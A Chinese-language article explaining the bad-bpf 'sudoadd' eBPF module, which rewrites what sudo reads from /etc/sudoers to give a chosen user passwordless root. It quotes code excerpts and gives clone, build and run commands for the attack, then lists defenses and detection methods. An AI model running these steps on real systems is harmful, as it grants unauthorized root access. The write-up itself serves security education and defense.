Sudo-Add权限提升详解:eBPF篡改/etc/sudoers文件实现无密码root
【免费下载链接】bad-bpfA collection of eBPF programs demonstrating bad behavior, presented at DEF CON 29项目地址: https://gitcode.com/gh_mirrors/ba/bad-bpf
在现代Linux系统安全中,eBPF技术常被用于性能分析和系统监控,但也可能被恶意利用。本文将深入解析bad-bpf项目中的sudoadd模块如何通过eBPF技术篡改/etc/sudoers文件,实现无密码获取root权限,帮助安全从业者了解这一攻击原理并增强防御能力。
什么是eBPF权限提升攻击?
eBPF(Extended Berkeley Packet Filter)是一种运行在内核空间的虚拟机技术,允许用户编写自定义程序在内核中执行。当被恶意利用时,攻击者可通过eBPF程序拦截系统调用、修改关键文件内容,从而绕过传统安全机制实现权限提升。sudoadd正是利用这一特性,通过篡改sudo命令读取的/etc/sudoers文件内容,达到无密码获取root权限的目的。
sudoadd攻击原理深度剖析
核心实现机制
sudoadd通过两个关键文件实现攻击:
- 用户态程序:sudoadd.c负责配置攻击参数并加载eBPF程序
- 内核态程序:sudoadd.bpf.c实现对
sudo命令的拦截和文件内容篡改
攻击流程主要分为三个阶段:
1. 目标进程识别与过滤
eBPF程序通过跟踪openat系统调用,识别sudo进程打开/etc/sudoers文件的操作:
// 检查进程是否为sudo const int sudo_len = 5; const char *sudo = "sudo"; for (int i = 0; i < sudo_len; i++) { if (comm[i] != sudo[i]) { return 0; } } // 检查是否正在打开/etc/sudoers文件 const int sudoers_len = 13; const char *sudoers = "/etc/sudoers"; char filename[sudoers_len]; bpf_probe_read_user(&filename, sudoers_len, (char*)ctx->args[1]);2. 文件内容拦截与篡改
当sudo进程读取/etc/sudoers文件时,eBPF程序拦截read系统调用,将文件内容替换为预设的权限配置:
// 构造sudoers配置 payload sprintf(skel->rodata->payload, "%s ALL=(ALL:ALL) NOPASSWD:ALL #", env.username); skel->rodata->payload_len = strlen(skel->rodata->payload); // 覆盖文件内容 for (unsigned int i = 0; i < max_payload_len; i++) { if (i >= payload_len) { local_buff[i] = '#'; // 注释掉原有内容 } else { local_buff[i] = payload[i]; // 写入新配置 } } bpf_probe_write_user((void*)buff_addr, local_buff, max_payload_len);3. 清理与隐蔽
攻击完成后,eBPF程序通过跟踪close系统调用清理临时数据,避免留下痕迹:
// 关闭文件时清理映射表 bpf_map_delete_elem(&map_fds, &pid_tgid); bpf_map_delete_elem(&map_buff_addrs, &pid_tgid);攻击实施步骤
环境准备
克隆项目代码库:
git clone https://gitcode.com/gh_mirrors/ba/bad-bpf cd bad-bpf/src编译项目:
make sudoadd
执行攻击
使用以下命令启动攻击程序,指定目标用户:
./sudoadd -u [目标用户名]此时,当目标用户执行sudo命令时,将无需输入密码直接获得root权限:
$ sudo -i # 无需密码直接进入root shell防御与检测方法
系统层面防御
- 限制eBPF权限:通过内核参数
kernel.unprivileged_bpf_disabled=1禁用非特权用户的eBPF功能 - 文件完整性监控:使用auditd监控
/etc/sudoers文件的访问和修改 - 最小权限原则:避免给普通用户授予
CAP_BPF等特权
检测技术
- 监控异常系统调用:检测
sudo进程打开/etc/sudoers文件时的异常读操作 - eBPF程序审计:定期检查系统中加载的eBPF程序,关注可疑的跟踪点和系统调用拦截
- 日志分析:分析
sudo日志中出现的无密码成功授权记录
总结与安全建议
sudoadd展示了eBPF技术被恶意利用的潜在风险,这种攻击方式具有隐蔽性高、难以检测的特点。安全从业者应:
- 加强对eBPF技术的安全管控
- 定期审计系统中的eBPF程序
- 部署文件完整性监控和异常行为检测
- 遵循最小权限原则配置系统
通过本文的分析,希望读者能深入理解eBPF权限提升攻击的原理,并采取有效的防御措施保护系统安全。项目中更多eBPF安全案例可参考src/目录下的其他模块实现。
【免费下载链接】bad-bpfA collection of eBPF programs demonstrating bad behavior, presented at DEF CON 29项目地址: https://gitcode.com/gh_mirrors/ba/bad-bpf
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考